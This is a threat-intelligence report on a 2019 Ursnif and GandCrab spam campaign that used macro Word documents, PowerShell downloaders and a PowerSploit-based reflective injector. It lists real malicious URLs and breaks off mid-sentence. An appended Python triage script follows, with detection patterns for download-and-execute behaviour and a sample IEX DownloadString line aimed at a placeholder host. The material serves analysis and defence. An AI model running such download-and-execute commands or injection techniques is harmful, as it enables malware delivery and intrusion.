Ursnif and Gandcrab Campaign with the Macro-Enabled Documents

Prepared for: LIFARS, LLC and its Subsidiaries
Prepared by: Ladislav Bačo
Date: 11/02/2019

This document and its content represent confidential information between LIFARS, LLC and company. As such, this document may not be shared with any outside party without the expressed consent of LIFARS, LLC and the company.

244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected]

Overview

During the first half of February 2019 there was an increase in spam messages carrying attached documents with names in the form “Request” followed by a number, such as “Request15.doc”. These documents contain slightly obfuscated macros which lead to execution of a PowerShell downloader. The PowerShell downloader connects to domains registered in the Russian Federation and resolving to Russian IP addresses. These servers appear to host malicious content, in many cases detected as the Ursnif malware.

Macro-enabled documents

The spam messages may contain a password-protected zipped Word document (with the password “1234567” written in the email body), or only the document itself. Usually the document has a blue background with text suggesting that the user enable macros, or enable editing and content, as shown in the following pictures:

Fig. 1: Documents with request for enabling macros

Each type of document contains its own macro code: in the first case it is executed on document open (AutoOpen), in the second case on document close (AutoClose), see Figure 2:

Fig. 2: Olevba tool output, AutoOpen and AutoClose macro execution

The macros can be extracted with the olevba tool. They are quite obfuscated, in the first case with multiple junk functions and select statements, in the second case with multiple junk variables.
These two types of obfuscation are presented below:

Fig. 3: First type of obfuscation
Fig. 4: Second type of obfuscation

After deobfuscation, these macros lead to running PowerShell with a base64-encoded command. The first type executes PowerShell directly; the second type first executes the shell with a command taken from the AlternativeText of one Shape. This alternative text contains the command for execution of PowerShell (in some cases the command first runs ‘cmd.exe’ and then ‘powershell’):

Fig. 5: First type macro deobfuscated
Fig. 6: Second type macro deobfuscated
Fig. 7: Second type macro deobfuscated: shape with powershell command

PowerShell downloaders

Decoding the base64 encoding reveals that the first PowerShell command is obfuscated (see Fig. 8), but after quick deobfuscation it is clear that this is a PowerShell downloader. It checks whether the downloaded executable file has at least 40kB and, if so, executes it (Fig. 9).

Fig. 8: Obfuscated PowerShell downloader
Fig. 9: Deobfuscated PowerShell downloader

Decoding the PowerShell command from the second document results in another downloader, which is not obfuscated in this case. It tries two approaches: first, download a string and invoke it as a PowerShell command; second, download an executable file and run it via ShellExecute.

Fig. 10: PowerShell downloader from the second document

Ursnif campaign

Unfortunately, the downloaded content was not present during our analysis and it was not available even during the analysis on Any.Run.
But using the VirusTotal domain information we can see that multiple executable files have been downloaded from this domain, and most of them have been identified as the Ursnif spyware.

Fig. 11: VirusTotal domain information
Fig. 12: VirusTotal detections

It seems that more domains are involved in this campaign, with more “RequestXX.doc” documents. Also, on Any.Run it is possible to see the increase in the number of submissions with these filenames tagged as Ursnif. These samples have been submitted since 5th February 2019 until now, and it seems that the campaign still continues, but with decreasing intensity.

Fig. 13: Any.Run public submissions

From these public submissions we can extract multiple domains contacted by the PowerShell downloaders. We can find even more samples with filenames like “Request15.doc” by using search engines (e.g. Google) targeted at sites related to malware analysis (e.g. VirusTotal, Hybrid-Analysis, …). With this set of domains and samples, it is possible to reveal even more IOCs of this campaign, such as contacted URLs, documents with PowerShell downloaders, downloaded executable files, etc. VirusTotal Graph is a very useful tool for visualization of relationships between malware-related entities. Creating an overview of the samples, the scope of the campaign and country attribution can be a matter of several minutes. In this case, our investigation has resulted in the following graph with malicious domains, URLs, documents and executable files:

Fig. 14: VirusTotal Graph of IOCs associated with the Ursnif campaign

The domains from the above examples have resolved to Russian IP addresses from the start of the attack (the US one is the exception: the domain pgarfielduozzelda.band has resolved to it only since 21st February, and the black flags are also Russian IP addresses according to whois), and most of these domains have been registered in the Russian Federation.

PowerShell downloader leading to GandCrab ransomware

During our analysis the downloaded content was not present on the involved servers, and in most cases it was not available even during analysis in sandboxes like Any.Run or Hybrid-Analysis. But after a while, we were able to find at least one analysis at Any.Run in which the PowerShell downloader successfully downloaded the malicious content. The second document from the first part of our analysis is actually the sample mentioned above, whose Any.Run report contains the downloaded data. Recall from the previous text that the analyzed document contains macros which lead to execution of the encoded PowerShell command. After decoding we can see the following PowerShell downloader:

Fig. 15: Decoded PowerShell downloader

The first URL, hxxp://89.223.92.190/704e.php (which is supplied to the method DownloadString), was active during the execution at Any.Run, so we can see the downloaded content, which is then invoked as a PowerShell expression (IEX in the picture above is the alias of the cmdlet Invoke-Expression).

Fig. 16: Captured communication with malicious URL
Fig. 17: Downloaded and executed content from the malicious URL

It is not obfuscated, and it is clear that this piece of PowerShell script downloads and executes a string again, but this time the content is downloaded from Pastebin. However, during the campaign only 8 AV engines detected this unobfuscated 2nd stage of the PowerShell downloader:

Fig. 18: VirusTotal detections of 2nd PowerShell downloader

Moreover, the content downloaded from Pastebin has an even lower detection ratio, with a score of only 1/69:

Fig. 19: VirusTotal detections of pastebin content

Before we proceed with this content from Pastebin, it is useful to recall the behavior of the 2nd PowerShell downloader:

- download and execute script from hxxps://pastebin.com/raw/9see7UfF
- execute function Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX (probably defined in the content downloaded from Pastebin)

PowerShell injector from Pastebin

Now, let’s continue with the Pastebin content. It is a mostly unobfuscated PowerShell script, too. It seems that only two function names are partially mangled: Invoke-HSOAWYAZUAGTMWM and the Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX mentioned above. The parameters of these functions are also readable, and we can find names like PEBytes, ExeArgs, ProcName and ProcId, which give us a sense of what this script is probably able to do.

Fig. 20: PowerShell script from Pastebin

Scrolling down the script, we find code related to the structure of PE files, like headers, sections, imports and exports, and code for accessing the Win32 API functions often used for code injection, like VirtualProtect, WriteProcessMemory, CreateRemoteThread.

Fig. 21: PowerShell code related to the structure of PE files
Fig. 22: PowerShell code related to the Win32 API functions used for code-injection

This code is nicely formatted and easily readable, with meaningful variable and function names, unlike the macros and PowerShell from the first part of the analysis. This is a reason to assume that the code is copy-pasted from some publicly known tool. Searching for code snippets brings us to PowerSploit’s Invoke-ReflectivePEInjection. Its name is self-describing: this script performs reflective injection of a PE file (DLL library) into the desired process and also loads all of the dependencies of the injected PE file. PowerSploit’s Invoke-ReflectivePEInjection looks very similar to our Pastebin content, with one big difference at the end of our sample: the function Invoke-HQLAPCCSDIGBUMKZIHEIZPFSX, containing Base64-encoded data used as the PEBytes argument of the function Invoke-HSOAWYAZUAGTMWM, which is the renamed function Invoke-ReflectivePEInjection from PowerSploit:

Fig.
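The decoding step from the "PowerShell downloaders" sections above, written as defender-side triage over process-creation records; this is an added example, not code from the LIFARS report. It finds the -EncodedCommand argument, decodes the base64/UTF-16LE script, and reports the downloader behaviours the report names together with URLs defanged in the report's hxxp style. The event field names, the indicator list, the verdict levels and the sample records are assumptions constructed for illustration.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe"}  # the documents on this page are Word files
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
INDICATORS = {  # behaviours the report attributes to the downloaders
    "DownloadString": re.compile(r"\.DownloadString\s*\(", re.I),
    "DownloadFile": re.compile(r"\.DownloadFile\s*\(", re.I),
    "Invoke-Expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "ShellExecute": re.compile(r"ShellExecute", re.I),
    "pastebin-raw": re.compile(r"pastebin\.com/raw/", re.I),
}


def find_encoded_blob(cmdline):
    """Return the argument that follows -EncodedCommand, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        name = tok[1:].lower()
        # PowerShell accepts unambiguous prefixes (-e, -enc, ...) and the alias -ec.
        if name and ("encodedcommand".startswith(name) or name == "ec"):
            return tokens[i + 1].strip("\"'")
    return None


def decode_blob(blob):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and truncated UTF-16
        return None


def defang(url):
    """Write URLs the way the report does (hxxp://...)."""
    return re.sub(r"^http", "hxxp", url, flags=re.I)


def triage(event):
    """Score one process-creation record; None means no encoded PowerShell command."""
    cmdline = event["cmdline"]
    if "powershell" not in cmdline.lower():
        return None
    blob = find_encoded_blob(cmdline)
    if blob is None:
        return None
    script = decode_blob(blob)
    office = event["parent"].lower() in OFFICE_PARENTS
    hits = sorted(n for n, rx in INDICATORS.items() if script and rx.search(script))
    urls = [defang(u) for u in URL_RE.findall(script or "")]
    if script is None:
        verdict = "undecodable"
    elif office and hits:
        verdict = "high"      # Word started an encoded downloader
    elif office or hits:
        verdict = "medium"
    else:
        verdict = "low"       # encoded command, nothing else suspicious
    return {"verdict": verdict, "office_parent": office,
            "indicators": hits, "urls": urls, "script": script}


def sample_blob(script):
    # Only used to build the constructed sample records below.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed records (not taken from the report); the host uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc " + sample_blob(
         "IEX (New-Object Net.WebClient).DownloadString("
         "'http://stage1.example.invalid/a.php')")},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + sample_blob("Get-Date")},
    {"parent": "WINWORD.EXE", "image": "splwow64.exe", "cmdline": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"], "->", triage(ev))
```

The first record models the ‘cmd.exe’ then ‘powershell’ variant, which is why the check looks at the whole command line rather than only at the image name.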